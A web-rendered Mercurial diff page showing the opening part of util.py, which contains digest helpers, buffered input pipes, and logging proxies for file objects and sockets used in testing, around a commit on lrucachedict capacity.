##// END OF EJS Templates
util: ability to change capacity when copying lrucachedict...
Gregory Szorc -
r39601:2dcc68c7 default
parent child Browse files
Show More
@@ -1,3885 +1,3898 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37 import zlib
38 38
39 39 from .thirdparty import (
40 40 attr,
41 41 )
42 42 from hgdemandimport import tracing
43 43 from . import (
44 44 encoding,
45 45 error,
46 46 i18n,
47 47 node as nodemod,
48 48 policy,
49 49 pycompat,
50 50 urllibcompat,
51 51 )
52 52 from .utils import (
53 53 procutil,
54 54 stringutil,
55 55 )
56 56
57 57 base85 = policy.importmod(r'base85')
58 58 osutil = policy.importmod(r'osutil')
59 59 parsers = policy.importmod(r'parsers')
60 60
61 61 b85decode = base85.b85decode
62 62 b85encode = base85.b85encode
63 63
64 64 cookielib = pycompat.cookielib
65 65 httplib = pycompat.httplib
66 66 pickle = pycompat.pickle
67 67 safehasattr = pycompat.safehasattr
68 68 socketserver = pycompat.socketserver
69 69 bytesio = pycompat.bytesio
70 70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 71 stringio = bytesio
72 72 xmlrpclib = pycompat.xmlrpclib
73 73
74 74 httpserver = urllibcompat.httpserver
75 75 urlerr = urllibcompat.urlerr
76 76 urlreq = urllibcompat.urlreq
77 77
78 78 # workaround for win32mbcs
79 79 _filenamebytestr = pycompat.bytestr
80 80
81 81 if pycompat.iswindows:
82 82 from . import windows as platform
83 83 else:
84 84 from . import posix as platform
85 85
86 86 _ = i18n._
87 87
88 88 bindunixsocket = platform.bindunixsocket
89 89 cachestat = platform.cachestat
90 90 checkexec = platform.checkexec
91 91 checklink = platform.checklink
92 92 copymode = platform.copymode
93 93 expandglobs = platform.expandglobs
94 94 getfsmountpoint = platform.getfsmountpoint
95 95 getfstype = platform.getfstype
96 96 groupmembers = platform.groupmembers
97 97 groupname = platform.groupname
98 98 isexec = platform.isexec
99 99 isowner = platform.isowner
100 100 listdir = osutil.listdir
101 101 localpath = platform.localpath
102 102 lookupreg = platform.lookupreg
103 103 makedir = platform.makedir
104 104 nlinks = platform.nlinks
105 105 normpath = platform.normpath
106 106 normcase = platform.normcase
107 107 normcasespec = platform.normcasespec
108 108 normcasefallback = platform.normcasefallback
109 109 openhardlinks = platform.openhardlinks
110 110 oslink = platform.oslink
111 111 parsepatchoutput = platform.parsepatchoutput
112 112 pconvert = platform.pconvert
113 113 poll = platform.poll
114 114 posixfile = platform.posixfile
115 115 rename = platform.rename
116 116 removedirs = platform.removedirs
117 117 samedevice = platform.samedevice
118 118 samefile = platform.samefile
119 119 samestat = platform.samestat
120 120 setflags = platform.setflags
121 121 split = platform.split
122 122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 123 statisexec = platform.statisexec
124 124 statislink = platform.statislink
125 125 umask = platform.umask
126 126 unlink = platform.unlink
127 127 username = platform.username
128 128
129 129 try:
130 130 recvfds = osutil.recvfds
131 131 except AttributeError:
132 132 pass
133 133
134 134 # Python compatibility
135 135
136 136 _notset = object()
137 137
138 138 def bitsfrom(container):
139 139 bits = 0
140 140 for bit in container:
141 141 bits |= bit
142 142 return bits
143 143
144 144 # python 2.6 still have deprecation warning enabled by default. We do not want
145 145 # to display anything to standard user so detect if we are running test and
146 146 # only use python deprecation warning in this case.
147 147 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
148 148 if _dowarn:
149 149 # explicitly unfilter our warning for python 2.7
150 150 #
151 151 # The option of setting PYTHONWARNINGS in the test runner was investigated.
152 152 # However, module name set through PYTHONWARNINGS was exactly matched, so
153 153 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
154 154 # makes the whole PYTHONWARNINGS thing useless for our usecase.
155 155 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
156 156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
157 157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
158 158 if _dowarn and pycompat.ispy3:
159 159 # silence warning emitted by passing user string to re.sub()
160 160 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
161 161 r'mercurial')
162 162 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
163 163 DeprecationWarning, r'mercurial')
164 164 # TODO: reinvent imp.is_frozen()
165 165 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
166 166 DeprecationWarning, r'mercurial')
167 167
168 168 def nouideprecwarn(msg, version, stacklevel=1):
169 169 """Issue an python native deprecation warning
170 170
171 171 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
172 172 """
173 173 if _dowarn:
174 174 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
175 175 " update your code.)") % version
176 176 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
177 177
178 178 DIGESTS = {
179 179 'md5': hashlib.md5,
180 180 'sha1': hashlib.sha1,
181 181 'sha512': hashlib.sha512,
182 182 }
183 183 # List of digest types from strongest to weakest
184 184 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
185 185
186 186 for k in DIGESTS_BY_STRENGTH:
187 187 assert k in DIGESTS
188 188
189 189 class digester(object):
190 190 """helper to compute digests.
191 191
192 192 This helper can be used to compute one or more digests given their name.
193 193
194 194 >>> d = digester([b'md5', b'sha1'])
195 195 >>> d.update(b'foo')
196 196 >>> [k for k in sorted(d)]
197 197 ['md5', 'sha1']
198 198 >>> d[b'md5']
199 199 'acbd18db4cc2f85cedef654fccc4a4d8'
200 200 >>> d[b'sha1']
201 201 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
202 202 >>> digester.preferred([b'md5', b'sha1'])
203 203 'sha1'
204 204 """
205 205
206 206 def __init__(self, digests, s=''):
207 207 self._hashes = {}
208 208 for k in digests:
209 209 if k not in DIGESTS:
210 210 raise error.Abort(_('unknown digest type: %s') % k)
211 211 self._hashes[k] = DIGESTS[k]()
212 212 if s:
213 213 self.update(s)
214 214
215 215 def update(self, data):
216 216 for h in self._hashes.values():
217 217 h.update(data)
218 218
219 219 def __getitem__(self, key):
220 220 if key not in DIGESTS:
221 221 raise error.Abort(_('unknown digest type: %s') % k)
222 222 return nodemod.hex(self._hashes[key].digest())
223 223
224 224 def __iter__(self):
225 225 return iter(self._hashes)
226 226
227 227 @staticmethod
228 228 def preferred(supported):
229 229 """returns the strongest digest type in both supported and DIGESTS."""
230 230
231 231 for k in DIGESTS_BY_STRENGTH:
232 232 if k in supported:
233 233 return k
234 234 return None
235 235
236 236 class digestchecker(object):
237 237 """file handle wrapper that additionally checks content against a given
238 238 size and digests.
239 239
240 240 d = digestchecker(fh, size, {'md5': '...'})
241 241
242 242 When multiple digests are given, all of them are validated.
243 243 """
244 244
245 245 def __init__(self, fh, size, digests):
246 246 self._fh = fh
247 247 self._size = size
248 248 self._got = 0
249 249 self._digests = dict(digests)
250 250 self._digester = digester(self._digests.keys())
251 251
252 252 def read(self, length=-1):
253 253 content = self._fh.read(length)
254 254 self._digester.update(content)
255 255 self._got += len(content)
256 256 return content
257 257
258 258 def validate(self):
259 259 if self._size != self._got:
260 260 raise error.Abort(_('size mismatch: expected %d, got %d') %
261 261 (self._size, self._got))
262 262 for k, v in self._digests.items():
263 263 if v != self._digester[k]:
264 264 # i18n: first parameter is a digest name
265 265 raise error.Abort(_('%s mismatch: expected %s, got %s') %
266 266 (k, v, self._digester[k]))
267 267
268 268 try:
269 269 buffer = buffer
270 270 except NameError:
271 271 def buffer(sliceable, offset=0, length=None):
272 272 if length is not None:
273 273 return memoryview(sliceable)[offset:offset + length]
274 274 return memoryview(sliceable)[offset:]
275 275
276 276 _chunksize = 4096
277 277
278 278 class bufferedinputpipe(object):
279 279 """a manually buffered input pipe
280 280
281 281 Python will not let us use buffered IO and lazy reading with 'polling' at
282 282 the same time. We cannot probe the buffer state and select will not detect
283 283 that data are ready to read if they are already buffered.
284 284
285 285 This class let us work around that by implementing its own buffering
286 286 (allowing efficient readline) while offering a way to know if the buffer is
287 287 empty from the output (allowing collaboration of the buffer with polling).
288 288
289 289 This class lives in the 'util' module because it makes use of the 'os'
290 290 module from the python stdlib.
291 291 """
292 292 def __new__(cls, fh):
293 293 # If we receive a fileobjectproxy, we need to use a variation of this
294 294 # class that notifies observers about activity.
295 295 if isinstance(fh, fileobjectproxy):
296 296 cls = observedbufferedinputpipe
297 297
298 298 return super(bufferedinputpipe, cls).__new__(cls)
299 299
300 300 def __init__(self, input):
301 301 self._input = input
302 302 self._buffer = []
303 303 self._eof = False
304 304 self._lenbuf = 0
305 305
306 306 @property
307 307 def hasbuffer(self):
308 308 """True is any data is currently buffered
309 309
310 310 This will be used externally a pre-step for polling IO. If there is
311 311 already data then no polling should be set in place."""
312 312 return bool(self._buffer)
313 313
314 314 @property
315 315 def closed(self):
316 316 return self._input.closed
317 317
318 318 def fileno(self):
319 319 return self._input.fileno()
320 320
321 321 def close(self):
322 322 return self._input.close()
323 323
324 324 def read(self, size):
325 325 while (not self._eof) and (self._lenbuf < size):
326 326 self._fillbuffer()
327 327 return self._frombuffer(size)
328 328
329 329 def unbufferedread(self, size):
330 330 if not self._eof and self._lenbuf == 0:
331 331 self._fillbuffer(max(size, _chunksize))
332 332 return self._frombuffer(min(self._lenbuf, size))
333 333
334 334 def readline(self, *args, **kwargs):
335 335 if 1 < len(self._buffer):
336 336 # this should not happen because both read and readline end with a
337 337 # _frombuffer call that collapse it.
338 338 self._buffer = [''.join(self._buffer)]
339 339 self._lenbuf = len(self._buffer[0])
340 340 lfi = -1
341 341 if self._buffer:
342 342 lfi = self._buffer[-1].find('\n')
343 343 while (not self._eof) and lfi < 0:
344 344 self._fillbuffer()
345 345 if self._buffer:
346 346 lfi = self._buffer[-1].find('\n')
347 347 size = lfi + 1
348 348 if lfi < 0: # end of file
349 349 size = self._lenbuf
350 350 elif 1 < len(self._buffer):
351 351 # we need to take previous chunks into account
352 352 size += self._lenbuf - len(self._buffer[-1])
353 353 return self._frombuffer(size)
354 354
355 355 def _frombuffer(self, size):
356 356 """return at most 'size' data from the buffer
357 357
358 358 The data are removed from the buffer."""
359 359 if size == 0 or not self._buffer:
360 360 return ''
361 361 buf = self._buffer[0]
362 362 if 1 < len(self._buffer):
363 363 buf = ''.join(self._buffer)
364 364
365 365 data = buf[:size]
366 366 buf = buf[len(data):]
367 367 if buf:
368 368 self._buffer = [buf]
369 369 self._lenbuf = len(buf)
370 370 else:
371 371 self._buffer = []
372 372 self._lenbuf = 0
373 373 return data
374 374
375 375 def _fillbuffer(self, size=_chunksize):
376 376 """read data to the buffer"""
377 377 data = os.read(self._input.fileno(), size)
378 378 if not data:
379 379 self._eof = True
380 380 else:
381 381 self._lenbuf += len(data)
382 382 self._buffer.append(data)
383 383
384 384 return data
385 385
386 386 def mmapread(fp):
387 387 try:
388 388 fd = getattr(fp, 'fileno', lambda: fp)()
389 389 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
390 390 except ValueError:
391 391 # Empty files cannot be mmapped, but mmapread should still work. Check
392 392 # if the file is empty, and if so, return an empty buffer.
393 393 if os.fstat(fd).st_size == 0:
394 394 return ''
395 395 raise
396 396
397 397 class fileobjectproxy(object):
398 398 """A proxy around file objects that tells a watcher when events occur.
399 399
400 400 This type is intended to only be used for testing purposes. Think hard
401 401 before using it in important code.
402 402 """
403 403 __slots__ = (
404 404 r'_orig',
405 405 r'_observer',
406 406 )
407 407
408 408 def __init__(self, fh, observer):
409 409 object.__setattr__(self, r'_orig', fh)
410 410 object.__setattr__(self, r'_observer', observer)
411 411
412 412 def __getattribute__(self, name):
413 413 ours = {
414 414 r'_observer',
415 415
416 416 # IOBase
417 417 r'close',
418 418 # closed if a property
419 419 r'fileno',
420 420 r'flush',
421 421 r'isatty',
422 422 r'readable',
423 423 r'readline',
424 424 r'readlines',
425 425 r'seek',
426 426 r'seekable',
427 427 r'tell',
428 428 r'truncate',
429 429 r'writable',
430 430 r'writelines',
431 431 # RawIOBase
432 432 r'read',
433 433 r'readall',
434 434 r'readinto',
435 435 r'write',
436 436 # BufferedIOBase
437 437 # raw is a property
438 438 r'detach',
439 439 # read defined above
440 440 r'read1',
441 441 # readinto defined above
442 442 # write defined above
443 443 }
444 444
445 445 # We only observe some methods.
446 446 if name in ours:
447 447 return object.__getattribute__(self, name)
448 448
449 449 return getattr(object.__getattribute__(self, r'_orig'), name)
450 450
451 451 def __nonzero__(self):
452 452 return bool(object.__getattribute__(self, r'_orig'))
453 453
454 454 __bool__ = __nonzero__
455 455
456 456 def __delattr__(self, name):
457 457 return delattr(object.__getattribute__(self, r'_orig'), name)
458 458
459 459 def __setattr__(self, name, value):
460 460 return setattr(object.__getattribute__(self, r'_orig'), name, value)
461 461
462 462 def __iter__(self):
463 463 return object.__getattribute__(self, r'_orig').__iter__()
464 464
465 465 def _observedcall(self, name, *args, **kwargs):
466 466 # Call the original object.
467 467 orig = object.__getattribute__(self, r'_orig')
468 468 res = getattr(orig, name)(*args, **kwargs)
469 469
470 470 # Call a method on the observer of the same name with arguments
471 471 # so it can react, log, etc.
472 472 observer = object.__getattribute__(self, r'_observer')
473 473 fn = getattr(observer, name, None)
474 474 if fn:
475 475 fn(res, *args, **kwargs)
476 476
477 477 return res
478 478
479 479 def close(self, *args, **kwargs):
480 480 return object.__getattribute__(self, r'_observedcall')(
481 481 r'close', *args, **kwargs)
482 482
483 483 def fileno(self, *args, **kwargs):
484 484 return object.__getattribute__(self, r'_observedcall')(
485 485 r'fileno', *args, **kwargs)
486 486
487 487 def flush(self, *args, **kwargs):
488 488 return object.__getattribute__(self, r'_observedcall')(
489 489 r'flush', *args, **kwargs)
490 490
491 491 def isatty(self, *args, **kwargs):
492 492 return object.__getattribute__(self, r'_observedcall')(
493 493 r'isatty', *args, **kwargs)
494 494
495 495 def readable(self, *args, **kwargs):
496 496 return object.__getattribute__(self, r'_observedcall')(
497 497 r'readable', *args, **kwargs)
498 498
499 499 def readline(self, *args, **kwargs):
500 500 return object.__getattribute__(self, r'_observedcall')(
501 501 r'readline', *args, **kwargs)
502 502
503 503 def readlines(self, *args, **kwargs):
504 504 return object.__getattribute__(self, r'_observedcall')(
505 505 r'readlines', *args, **kwargs)
506 506
507 507 def seek(self, *args, **kwargs):
508 508 return object.__getattribute__(self, r'_observedcall')(
509 509 r'seek', *args, **kwargs)
510 510
511 511 def seekable(self, *args, **kwargs):
512 512 return object.__getattribute__(self, r'_observedcall')(
513 513 r'seekable', *args, **kwargs)
514 514
515 515 def tell(self, *args, **kwargs):
516 516 return object.__getattribute__(self, r'_observedcall')(
517 517 r'tell', *args, **kwargs)
518 518
519 519 def truncate(self, *args, **kwargs):
520 520 return object.__getattribute__(self, r'_observedcall')(
521 521 r'truncate', *args, **kwargs)
522 522
523 523 def writable(self, *args, **kwargs):
524 524 return object.__getattribute__(self, r'_observedcall')(
525 525 r'writable', *args, **kwargs)
526 526
527 527 def writelines(self, *args, **kwargs):
528 528 return object.__getattribute__(self, r'_observedcall')(
529 529 r'writelines', *args, **kwargs)
530 530
531 531 def read(self, *args, **kwargs):
532 532 return object.__getattribute__(self, r'_observedcall')(
533 533 r'read', *args, **kwargs)
534 534
535 535 def readall(self, *args, **kwargs):
536 536 return object.__getattribute__(self, r'_observedcall')(
537 537 r'readall', *args, **kwargs)
538 538
539 539 def readinto(self, *args, **kwargs):
540 540 return object.__getattribute__(self, r'_observedcall')(
541 541 r'readinto', *args, **kwargs)
542 542
543 543 def write(self, *args, **kwargs):
544 544 return object.__getattribute__(self, r'_observedcall')(
545 545 r'write', *args, **kwargs)
546 546
547 547 def detach(self, *args, **kwargs):
548 548 return object.__getattribute__(self, r'_observedcall')(
549 549 r'detach', *args, **kwargs)
550 550
551 551 def read1(self, *args, **kwargs):
552 552 return object.__getattribute__(self, r'_observedcall')(
553 553 r'read1', *args, **kwargs)
554 554
555 555 class observedbufferedinputpipe(bufferedinputpipe):
556 556 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
557 557
558 558 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
559 559 bypass ``fileobjectproxy``. Because of this, we need to make
560 560 ``bufferedinputpipe`` aware of these operations.
561 561
562 562 This variation of ``bufferedinputpipe`` can notify observers about
563 563 ``os.read()`` events. It also re-publishes other events, such as
564 564 ``read()`` and ``readline()``.
565 565 """
566 566 def _fillbuffer(self):
567 567 res = super(observedbufferedinputpipe, self)._fillbuffer()
568 568
569 569 fn = getattr(self._input._observer, r'osread', None)
570 570 if fn:
571 571 fn(res, _chunksize)
572 572
573 573 return res
574 574
575 575 # We use different observer methods because the operation isn't
576 576 # performed on the actual file object but on us.
577 577 def read(self, size):
578 578 res = super(observedbufferedinputpipe, self).read(size)
579 579
580 580 fn = getattr(self._input._observer, r'bufferedread', None)
581 581 if fn:
582 582 fn(res, size)
583 583
584 584 return res
585 585
586 586 def readline(self, *args, **kwargs):
587 587 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
588 588
589 589 fn = getattr(self._input._observer, r'bufferedreadline', None)
590 590 if fn:
591 591 fn(res)
592 592
593 593 return res
594 594
595 595 PROXIED_SOCKET_METHODS = {
596 596 r'makefile',
597 597 r'recv',
598 598 r'recvfrom',
599 599 r'recvfrom_into',
600 600 r'recv_into',
601 601 r'send',
602 602 r'sendall',
603 603 r'sendto',
604 604 r'setblocking',
605 605 r'settimeout',
606 606 r'gettimeout',
607 607 r'setsockopt',
608 608 }
609 609
610 610 class socketproxy(object):
611 611 """A proxy around a socket that tells a watcher when events occur.
612 612
613 613 This is like ``fileobjectproxy`` except for sockets.
614 614
615 615 This type is intended to only be used for testing purposes. Think hard
616 616 before using it in important code.
617 617 """
618 618 __slots__ = (
619 619 r'_orig',
620 620 r'_observer',
621 621 )
622 622
623 623 def __init__(self, sock, observer):
624 624 object.__setattr__(self, r'_orig', sock)
625 625 object.__setattr__(self, r'_observer', observer)
626 626
627 627 def __getattribute__(self, name):
628 628 if name in PROXIED_SOCKET_METHODS:
629 629 return object.__getattribute__(self, name)
630 630
631 631 return getattr(object.__getattribute__(self, r'_orig'), name)
632 632
633 633 def __delattr__(self, name):
634 634 return delattr(object.__getattribute__(self, r'_orig'), name)
635 635
636 636 def __setattr__(self, name, value):
637 637 return setattr(object.__getattribute__(self, r'_orig'), name, value)
638 638
639 639 def __nonzero__(self):
640 640 return bool(object.__getattribute__(self, r'_orig'))
641 641
642 642 __bool__ = __nonzero__
643 643
644 644 def _observedcall(self, name, *args, **kwargs):
645 645 # Call the original object.
646 646 orig = object.__getattribute__(self, r'_orig')
647 647 res = getattr(orig, name)(*args, **kwargs)
648 648
649 649 # Call a method on the observer of the same name with arguments
650 650 # so it can react, log, etc.
651 651 observer = object.__getattribute__(self, r'_observer')
652 652 fn = getattr(observer, name, None)
653 653 if fn:
654 654 fn(res, *args, **kwargs)
655 655
656 656 return res
657 657
658 658 def makefile(self, *args, **kwargs):
659 659 res = object.__getattribute__(self, r'_observedcall')(
660 660 r'makefile', *args, **kwargs)
661 661
662 662 # The file object may be used for I/O. So we turn it into a
663 663 # proxy using our observer.
664 664 observer = object.__getattribute__(self, r'_observer')
665 665 return makeloggingfileobject(observer.fh, res, observer.name,
666 666 reads=observer.reads,
667 667 writes=observer.writes,
668 668 logdata=observer.logdata,
669 669 logdataapis=observer.logdataapis)
670 670
671 671 def recv(self, *args, **kwargs):
672 672 return object.__getattribute__(self, r'_observedcall')(
673 673 r'recv', *args, **kwargs)
674 674
675 675 def recvfrom(self, *args, **kwargs):
676 676 return object.__getattribute__(self, r'_observedcall')(
677 677 r'recvfrom', *args, **kwargs)
678 678
679 679 def recvfrom_into(self, *args, **kwargs):
680 680 return object.__getattribute__(self, r'_observedcall')(
681 681 r'recvfrom_into', *args, **kwargs)
682 682
683 683 def recv_into(self, *args, **kwargs):
684 684 return object.__getattribute__(self, r'_observedcall')(
685 685 r'recv_info', *args, **kwargs)
686 686
687 687 def send(self, *args, **kwargs):
688 688 return object.__getattribute__(self, r'_observedcall')(
689 689 r'send', *args, **kwargs)
690 690
691 691 def sendall(self, *args, **kwargs):
692 692 return object.__getattribute__(self, r'_observedcall')(
693 693 r'sendall', *args, **kwargs)
694 694
695 695 def sendto(self, *args, **kwargs):
696 696 return object.__getattribute__(self, r'_observedcall')(
697 697 r'sendto', *args, **kwargs)
698 698
699 699 def setblocking(self, *args, **kwargs):
700 700 return object.__getattribute__(self, r'_observedcall')(
701 701 r'setblocking', *args, **kwargs)
702 702
703 703 def settimeout(self, *args, **kwargs):
704 704 return object.__getattribute__(self, r'_observedcall')(
705 705 r'settimeout', *args, **kwargs)
706 706
707 707 def gettimeout(self, *args, **kwargs):
708 708 return object.__getattribute__(self, r'_observedcall')(
709 709 r'gettimeout', *args, **kwargs)
710 710
711 711 def setsockopt(self, *args, **kwargs):
712 712 return object.__getattribute__(self, r'_observedcall')(
713 713 r'setsockopt', *args, **kwargs)
714 714
715 715 class baseproxyobserver(object):
716 716 def _writedata(self, data):
717 717 if not self.logdata:
718 718 if self.logdataapis:
719 719 self.fh.write('\n')
720 720 self.fh.flush()
721 721 return
722 722
723 723 # Simple case writes all data on a single line.
724 724 if b'\n' not in data:
725 725 if self.logdataapis:
726 726 self.fh.write(': %s\n' % stringutil.escapestr(data))
727 727 else:
728 728 self.fh.write('%s> %s\n'
729 729 % (self.name, stringutil.escapestr(data)))
730 730 self.fh.flush()
731 731 return
732 732
733 733 # Data with newlines is written to multiple lines.
734 734 if self.logdataapis:
735 735 self.fh.write(':\n')
736 736
737 737 lines = data.splitlines(True)
738 738 for line in lines:
739 739 self.fh.write('%s> %s\n'
740 740 % (self.name, stringutil.escapestr(line)))
741 741 self.fh.flush()
742 742
743 743 class fileobjectobserver(baseproxyobserver):
744 744 """Logs file object activity."""
745 745 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
746 746 logdataapis=True):
747 747 self.fh = fh
748 748 self.name = name
749 749 self.logdata = logdata
750 750 self.logdataapis = logdataapis
751 751 self.reads = reads
752 752 self.writes = writes
753 753
754 754 def read(self, res, size=-1):
755 755 if not self.reads:
756 756 return
757 757 # Python 3 can return None from reads at EOF instead of empty strings.
758 758 if res is None:
759 759 res = ''
760 760
761 761 if size == -1 and res == '':
762 762 # Suppress pointless read(-1) calls that return
763 763 # nothing. These happen _a lot_ on Python 3, and there
764 764 # doesn't seem to be a better workaround to have matching
765 765 # Python 2 and 3 behavior. :(
766 766 return
767 767
768 768 if self.logdataapis:
769 769 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
770 770
771 771 self._writedata(res)
772 772
773 773 def readline(self, res, limit=-1):
774 774 if not self.reads:
775 775 return
776 776
777 777 if self.logdataapis:
778 778 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
779 779
780 780 self._writedata(res)
781 781
782 782 def readinto(self, res, dest):
783 783 if not self.reads:
784 784 return
785 785
786 786 if self.logdataapis:
787 787 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
788 788 res))
789 789
790 790 data = dest[0:res] if res is not None else b''
791 791 self._writedata(data)
792 792
793 793 def write(self, res, data):
794 794 if not self.writes:
795 795 return
796 796
797 797 # Python 2 returns None from some write() calls. Python 3 (reasonably)
798 798 # returns the integer bytes written.
799 799 if res is None and data:
800 800 res = len(data)
801 801
802 802 if self.logdataapis:
803 803 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
804 804
805 805 self._writedata(data)
806 806
807 807 def flush(self, res):
808 808 if not self.writes:
809 809 return
810 810
811 811 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
812 812
813 813 # For observedbufferedinputpipe.
814 814 def bufferedread(self, res, size):
815 815 if not self.reads:
816 816 return
817 817
818 818 if self.logdataapis:
819 819 self.fh.write('%s> bufferedread(%d) -> %d' % (
820 820 self.name, size, len(res)))
821 821
822 822 self._writedata(res)
823 823
824 824 def bufferedreadline(self, res):
825 825 if not self.reads:
826 826 return
827 827
828 828 if self.logdataapis:
829 829 self.fh.write('%s> bufferedreadline() -> %d' % (
830 830 self.name, len(res)))
831 831
832 832 self._writedata(res)
833 833
834 834 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
835 835 logdata=False, logdataapis=True):
836 836 """Turn a file object into a logging file object."""
837 837
838 838 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
839 839 logdata=logdata, logdataapis=logdataapis)
840 840 return fileobjectproxy(fh, observer)
841 841
842 842 class socketobserver(baseproxyobserver):
843 843 """Logs socket activity."""
844 844 def __init__(self, fh, name, reads=True, writes=True, states=True,
845 845 logdata=False, logdataapis=True):
846 846 self.fh = fh
847 847 self.name = name
848 848 self.reads = reads
849 849 self.writes = writes
850 850 self.states = states
851 851 self.logdata = logdata
852 852 self.logdataapis = logdataapis
853 853
854 854 def makefile(self, res, mode=None, bufsize=None):
855 855 if not self.states:
856 856 return
857 857
858 858 self.fh.write('%s> makefile(%r, %r)\n' % (
859 859 self.name, mode, bufsize))
860 860
861 861 def recv(self, res, size, flags=0):
862 862 if not self.reads:
863 863 return
864 864
865 865 if self.logdataapis:
866 866 self.fh.write('%s> recv(%d, %d) -> %d' % (
867 867 self.name, size, flags, len(res)))
868 868 self._writedata(res)
869 869
870 870 def recvfrom(self, res, size, flags=0):
871 871 if not self.reads:
872 872 return
873 873
874 874 if self.logdataapis:
875 875 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
876 876 self.name, size, flags, len(res[0])))
877 877
878 878 self._writedata(res[0])
879 879
880 880 def recvfrom_into(self, res, buf, size, flags=0):
881 881 if not self.reads:
882 882 return
883 883
884 884 if self.logdataapis:
885 885 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
886 886 self.name, size, flags, res[0]))
887 887
888 888 self._writedata(buf[0:res[0]])
889 889
890 890 def recv_into(self, res, buf, size=0, flags=0):
891 891 if not self.reads:
892 892 return
893 893
894 894 if self.logdataapis:
895 895 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
896 896 self.name, size, flags, res))
897 897
898 898 self._writedata(buf[0:res])
899 899
900 900 def send(self, res, data, flags=0):
901 901 if not self.writes:
902 902 return
903 903
904 904 self.fh.write('%s> send(%d, %d) -> %d' % (
905 905 self.name, len(data), flags, len(res)))
906 906 self._writedata(data)
907 907
908 908 def sendall(self, res, data, flags=0):
909 909 if not self.writes:
910 910 return
911 911
912 912 if self.logdataapis:
913 913 # Returns None on success. So don't bother reporting return value.
914 914 self.fh.write('%s> sendall(%d, %d)' % (
915 915 self.name, len(data), flags))
916 916
917 917 self._writedata(data)
918 918
919 919 def sendto(self, res, data, flagsoraddress, address=None):
920 920 if not self.writes:
921 921 return
922 922
923 923 if address:
924 924 flags = flagsoraddress
925 925 else:
926 926 flags = 0
927 927
928 928 if self.logdataapis:
929 929 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
930 930 self.name, len(data), flags, address, res))
931 931
932 932 self._writedata(data)
933 933
934 934 def setblocking(self, res, flag):
935 935 if not self.states:
936 936 return
937 937
938 938 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
939 939
940 940 def settimeout(self, res, value):
941 941 if not self.states:
942 942 return
943 943
944 944 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
945 945
946 946 def gettimeout(self, res):
947 947 if not self.states:
948 948 return
949 949
950 950 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
951 951
952 952 def setsockopt(self, res, level, optname, value):
953 953 if not self.states:
954 954 return
955 955
956 956 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
957 957 self.name, level, optname, value, res))
958 958
959 959 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
960 960 logdata=False, logdataapis=True):
961 961 """Turn a socket into a logging socket."""
962 962
963 963 observer = socketobserver(logh, name, reads=reads, writes=writes,
964 964 states=states, logdata=logdata,
965 965 logdataapis=logdataapis)
966 966 return socketproxy(fh, observer)
967 967
968 968 def version():
969 969 """Return version information if available."""
970 970 try:
971 971 from . import __version__
972 972 return __version__.version
973 973 except ImportError:
974 974 return 'unknown'
975 975
976 976 def versiontuple(v=None, n=4):
977 977 """Parses a Mercurial version string into an N-tuple.
978 978
979 979 The version string to be parsed is specified with the ``v`` argument.
980 980 If it isn't defined, the current Mercurial version string will be parsed.
981 981
982 982 ``n`` can be 2, 3, or 4. Here is how some version strings map to
983 983 returned values:
984 984
985 985 >>> v = b'3.6.1+190-df9b73d2d444'
986 986 >>> versiontuple(v, 2)
987 987 (3, 6)
988 988 >>> versiontuple(v, 3)
989 989 (3, 6, 1)
990 990 >>> versiontuple(v, 4)
991 991 (3, 6, 1, '190-df9b73d2d444')
992 992
993 993 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
994 994 (3, 6, 1, '190-df9b73d2d444+20151118')
995 995
996 996 >>> v = b'3.6'
997 997 >>> versiontuple(v, 2)
